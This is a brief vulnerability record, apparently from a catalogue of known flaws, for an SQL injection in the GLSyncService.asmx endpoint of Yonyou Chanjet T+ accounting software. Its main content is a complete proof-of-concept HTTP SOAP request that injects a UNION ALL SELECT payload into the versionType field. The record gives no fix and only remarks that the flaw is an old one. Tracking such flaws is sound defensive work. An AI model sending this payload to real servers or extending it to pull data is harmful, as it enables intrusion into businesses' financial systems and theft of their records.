vendor = "用友"
name = "用友 畅捷通T+ GLSyncService.asmx SQL注入"
type = "SQL注入"
version = "未知"
path = "/tplus/GLSyncService.asmx"
detail = "POST /tplus/GLSyncService.asmx HTTP/1.1 Host: SOAPAction: \"http://www.chanjet.com/GetSourceAccountDataTable\"Content-Type: text/xml; charset=utf-8 <?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> <soap:Body> <GetSourceAccountDataTable xmlns=\"http://www.chanjet.com/\"> <versionType>' UNION ALL SELECT NULL,@@VERSION,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- VsIH</versionType> </GetSourceAccountDataTable> </soap:Body></soap:Envelope>"
fix = "老洞，有人当新洞发"
date = "0705"
label = "nday"
verifier = "AdySec"
